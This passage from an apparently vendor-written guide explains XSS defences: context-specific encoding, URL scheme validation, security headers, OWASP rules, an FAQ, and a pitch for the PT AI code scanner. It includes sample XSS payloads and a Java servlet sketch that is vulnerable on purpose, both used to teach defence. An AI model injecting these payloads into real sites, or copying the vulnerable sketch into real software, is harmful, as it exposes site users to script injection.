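                case '/':  out.append("&#x2F;"); break; // part of a closing tag
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```

For the input from the previous example, encodeForHtml returns "&lt;script&gt;alert(1)&lt;&#x2F;script&gt;".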

The LibProtection library can determine the context automatically and sanitize data accordingly. It can also signal when input data contains an attack vector.

For example, the following code fragment contains three points at which user data can be embedded:

  • Value attribute of HTML element (a)
  • Value of JavaScript parameter (b)
  • Content of HTML element (c)
    
Response.Write($"<a href='{a}' onclick='alert(\"{b}\");return false'>{c}</a>");

Let's assume that the attacker has passed the following variables as input:

    
a = 'onmouseover='alert(`XSS`)
b = ");alert(`XSS`)
c = <script>alert(`XSS`)</script>

If we do not check the input, the response will look like this:

    
<a href=''onmouseover='alert(`XSS`)' onclick='alert("");alert(`XSS`)");return false'><script>alert(`XSS`)</script></a>

This gives the attacker three different ways to perform an XSS attack. LibProtection determines the context of each insertion point and applies the matching conversion rules, transparently to the developer:

    
Response.Write(SafeString.Format<Html>($"<a href='{a}' onclick='alert(\"{b}\");return false'>{c}</a>"));

The resulting string is converted to:

    
<a href='%27onmouseover%3d%27alert(%60XSS%60)' onclick='alert("\&quot;);alert(`XSS`)");return false'>&lt;script&gt;alert(`XSS`)&lt;/script&gt;</a>

LibProtection supports C#, Java, and C++ and can also sanitize inputs against other types of attacks, including SQL injection and vulnerabilities caused by improper handling of URLs and file paths.

Client- and server-side sanitization

Data can be sanitized in different ways depending on the application architecture and the programming languages used. Because server-side technologies differ so much, it is hard to recommend a single approach for checks on the server side. But since JavaScript has become the de facto standard on the client side, we can still formulate universal principles for the same contexts listed above. The general rule is to use DOM APIs that treat untrusted data as text rather than markup: for example, assign it to an element's textContent property instead of innerHTML, set ordinary attributes such as value with setAttribute, and encode URL parameter values with encodeURIComponent.

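All sanitizing algorithms have limitations. For instance, even if you apply encoding rules to data placed in the href HTML attribute, an attacker can still pass a URL that starts with "javascript:". Such a URL contains no characters that HTML encoding changes, so it has to be validated separately.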
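One way to address this limitation is to validate the URL itself before it is placed into an href attribute, accepting only an allowlist of schemes. The sketch below uses java.net.URI from the JDK; the class name HrefValidator and the policy of allowing only absolute http and https URLs are assumptions made for illustration.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

// Validates a URL before it is placed into an href attribute.
final class HrefValidator {

    // Hypothetical policy: only absolute http and https URLs are allowed.
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    private HrefValidator() {}

    static boolean isSafeHref(String raw) {
        if (raw == null) {
            return false;
        }
        try {
            // trim() removes leading and trailing spaces and control
            // characters, which browsers also strip from URLs.
            URI uri = new URI(raw.trim());
            String scheme = uri.getScheme();
            // Relative URLs have no scheme and are rejected for simplicity.
            return scheme != null
                    && ALLOWED_SCHEMES.contains(scheme.toLowerCase(Locale.ROOT));
        } catch (URISyntaxException e) {
            return false; // unparseable input is rejected
        }
    }
}
```

The scheme comparison is case-insensitive, so JaVaScRiPt:alert(1) is rejected just like javascript:alert(1). An application that needs relative links would have to allow them explicitly.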

Additional XSS prevention measures

Checking inputs and outputs is the main way to protect against XSS attacks—but not the only one. You should also consider:

  • Correct Content-Type and X-Content-Type-Options headers. Make sure that responses not meant to be HTML (for example, JSON data) are not served as "text/html", and prevent the browser from automatically detecting the data type by sending X-Content-Type-Options: nosniff.
  • Use of a Content Security Policy (CSP) to minimize negative consequences when malicious code is injected.
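Both header-level measures can be sketched with the HTTP server built into the JDK (com.sun.net.httpserver), chosen here only so that the example needs no external dependencies; in a servlet or Spring application, the same headers would be set on the response object. The class name and the Content-Security-Policy value are illustrative assumptions; a real policy depends on what the application loads.

```java
import com.sun.net.httpserver.Headers;
import com.sun.net.httpserver.HttpExchange;
import java.io.IOException;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;

// Sends JSON with headers that keep the browser from treating it as HTML.
final class JsonResponses {

    // Hypothetical example policy: resources and scripts only from the
    // page's own origin, no plugins.
    static final String CSP = "default-src 'self'; script-src 'self'; object-src 'none'";

    private JsonResponses() {}

    static Headers securityHeaders() {
        Headers headers = new Headers();
        // Declare the real type of the data instead of text/html.
        headers.set("Content-Type", "application/json; charset=utf-8");
        // Forbid MIME sniffing so the declared type is respected.
        headers.set("X-Content-Type-Options", "nosniff");
        // Limit what injected markup could load or execute.
        headers.set("Content-Security-Policy", CSP);
        return headers;
    }

    static void sendJson(HttpExchange exchange, String json) throws IOException {
        byte[] body = json.getBytes(StandardCharsets.UTF_8);
        exchange.getResponseHeaders().putAll(securityHeaders());
        exchange.sendResponseHeaders(200, body.length);
        try (OutputStream os = exchange.getResponseBody()) {
            os.write(body);
        }
    }
}
```

Inside an HttpHandler, calling sendJson(exchange, json) returns the data as application/json with sniffing disabled, so the browser does not render it as an HTML page even if it contains markup.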

XSS cheat sheet

The OWASP XSS Prevention Cheat Sheet provides guidance against a huge number of XSS attack vectors, but even its basic rules are enough to stop the majority of attacks. Here are the most important ones:

  • Never insert untrusted data except in allowed locations.
  • Use HTML escaping before putting untrusted data into the HTML body.
  • Use attribute escaping before putting untrusted data into common HTML attributes.
  • Use JavaScript escaping before putting untrusted data into JavaScript data values.
  • Use CSS escaping before putting untrusted data into HTML style property values.
  • Use URL escaping before putting untrusted data into HTML URL parameter values.
  • Use a library to parse and sanitize HTML-formatted text.
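Two of these rules, JavaScript escaping and URL escaping, can be sketched with the JDK alone. The class and method names are hypothetical. The JavaScript encoder follows the OWASP recommendation to escape every character except ASCII letters and digits, here as \xHH (or \uXXXX above U+00FF); its output is meant to be placed inside a quoted JavaScript string. URL parameter values are encoded with the JDK's URLEncoder, which uses form encoding, so a space becomes "+".

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.Locale;

// Context-specific encoders for JavaScript string values and URL parameters.
final class ContextEncoders {

    private ContextEncoders() {}

    // Escapes every character except ASCII letters and digits, so untrusted
    // data cannot close the string literal or the surrounding script block.
    static String encodeForJsString(String input) {
        StringBuilder out = new StringBuilder(input.length() * 4);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            boolean alnum = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9');
            if (alnum) {
                out.append(c);
            } else if (c < 256) {
                out.append(String.format(Locale.ROOT, "\\x%02X", (int) c));
            } else {
                out.append(String.format(Locale.ROOT, "\\u%04X", (int) c));
            }
        }
        return out.toString();
    }

    // Percent-encodes a URL parameter value using UTF-8.
    static String encodeForUrlParam(String input) {
        return URLEncoder.encode(input, StandardCharsets.UTF_8);
    }
}
```

For example, the payload ");alert(1)// becomes \x22\x29\x3Balert\x281\x29\x2F\x2F and stays inside the string literal, while "a b&c=<d>" becomes "a+b%26c%3D%3Cd%3E" as a URL parameter value.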

Since XSS can be used to infiltrate a website and attack users in many ways, it's important to approach security from multiple perspectives. Train developers in secure coding and best practices. Scan the codebase as early and as often as possible to detect potential vulnerabilities. Pay special attention to accounts that have administrative privileges and the ability to modify page contents. For further guidance on website security, refer to trustworthy sources such as the OWASP Cheat Sheet Series.

FAQ

What is an XSS payload?

A payload is an attack vector used to exploit a vulnerability. If there are vulnerabilities in code, the input data sent by the attacker may be incorrectly used by the application to modify the application's logic. In the case of XSS, the payload contains JavaScript instructions that are used by an attacker to modify client-side browser logic.

What is XSS filtering?

XSS filtering blocks the exploits used in XSS attacks. During filtering, input data is standardized (cast from a string to an object of a given type) and verified for syntax and semantics. The data is then sanitized for the context in which it is output. This prevents the browser from interpreting the output as JavaScript.

What is an XSS polyglot?

As noted in the section on sanitization, principles for validating input data vary depending on the context in which this data is used. Attack vectors for exploiting XSS vulnerabilities are built with this context in mind as well. An XSS polyglot is a single, complex attack vector crafted to work in several contexts at once, such as in a URL, the content of an HTML element, and JavaScript.

What are the dangers of XSS?

The main danger of XSS is that it can give a malicious actor nearly the same capabilities as the victim. A successful XSS attack lets the attacker perform any action in the web application that is available to the user, such as performing financial transactions and sending messages. XSS can also be used to capture the user's keystrokes and transmit them to the attacker. This gives malicious actors ample opportunity for follow-on attacks.

What is the difference between XSS and SQL injection?

The main difference is that the target in XSS is the end user, while SQL injection modifies the logic of database queries on the server side.

What is the difference between XSS and CSRF?

Cross-site request forgery (CSRF) is a type of attack in which a malicious actor makes the victim's browser send a specific request on the victim's behalf, for example to change a password or perform a transaction. With successful XSS exploitation, attackers can do much more, because they can execute arbitrary JavaScript on the client side. Since the attacker can also impersonate the client when sending requests, XSS has greater potential for harm.

What is the difference between XSS and XSSI?

XSSI (cross-site script inclusion) vulnerabilities exploit a gap in the same-origin policy, which determines whether documents, resources, and scripts from different origins can interact with each other. This policy does not restrict the inclusion of scripts, so an attacker's webpage can load a script from the victim's website. If that script is generated dynamically and contains sensitive information, the information becomes available to the attacker when a user visits the attacker's site.

PT AI XSS testing tool

XSS is an injection vulnerability in which input (containing the attack vector) can affect execution logic in potentially dangerous functions. Automated analysis of application code is one of the best options for detecting it. Positive Technologies Application Inspector (PT AI) is a product that helps find vulnerabilities in application source code using multiple advanced techniques.

The following screenshot shows how a detected XSS vulnerability looks in PT AI:

PT AI detects vulnerabilities and creates exploits for verification. Additionally, it helps you to process results in convenient ways, including an interactive data flow diagram that visually demonstrates how exploitation of a vulnerability can occur.

The data flow diagram in the following screenshot shows the entry point, which in this case is the standard doGet Java servlet handler. Below it are:

  • The taint entry point, where the value of the NAME parameter from the request is read.
  • A potentially dangerous function for returning the response in HTML.
  • All intermediate stages involving data handling.
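The stages listed above can be illustrated with a deliberately vulnerable, simplified sketch. It is not taken from PT AI or its documentation: the class and method names are hypothetical, and a Map stands in for the servlet request so that the example runs with the JDK alone.

```java
import java.util.Map;

// Hypothetical, simplified reflected-XSS flow of the kind a data flow
// diagram traces. DELIBERATELY VULNERABLE: for illustration only.
final class GreetingPage {

    private GreetingPage() {}

    // Entry point: plays the role of the servlet's doGet handler.
    static String handle(Map<String, String> requestParams) {
        // Taint entry point: the NAME parameter is read from the request.
        String name = requestParams.getOrDefault("NAME", "guest");
        // Intermediate stage: the tainted value is propagated unchanged.
        String greeting = "Hello, " + name + "!";
        // The tainted value is passed to the HTML-producing function.
        return renderHtml(greeting);
    }

    // Potentially dangerous function: builds HTML without encoding its input.
    private static String renderHtml(String body) {
        return "<html><body><p>" + body + "</p></body></html>";
    }
}
```

Here the value of NAME flows from the taint entry point to renderHtml without encoding, so a payload such as <script>alert(1)</script> reaches the page intact. Encoding the value for the HTML context before it reaches that function breaks the flow.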

This approach also works against stored XSS. In this case, the taint entry points are code fragments that read untrusted data from server-side sources, such as a database or file system.

The following screenshot demonstrates this case precisely. Line 93 is the taint entry point, where data is read from the "cname" column:

Pros of PT AI:

  • Performs complete analysis with a low rate of false positives.
  • Can be integrated into the development cycle via CI/CD infrastructure.
  • Supports static, interactive, and dynamic analysis.
  • Finds real and potential vulnerabilities.
  • Able to automatically generate exploits.
  • Analyzes configuration files for web servers and application servers.

Cons:

  • Works only on Windows.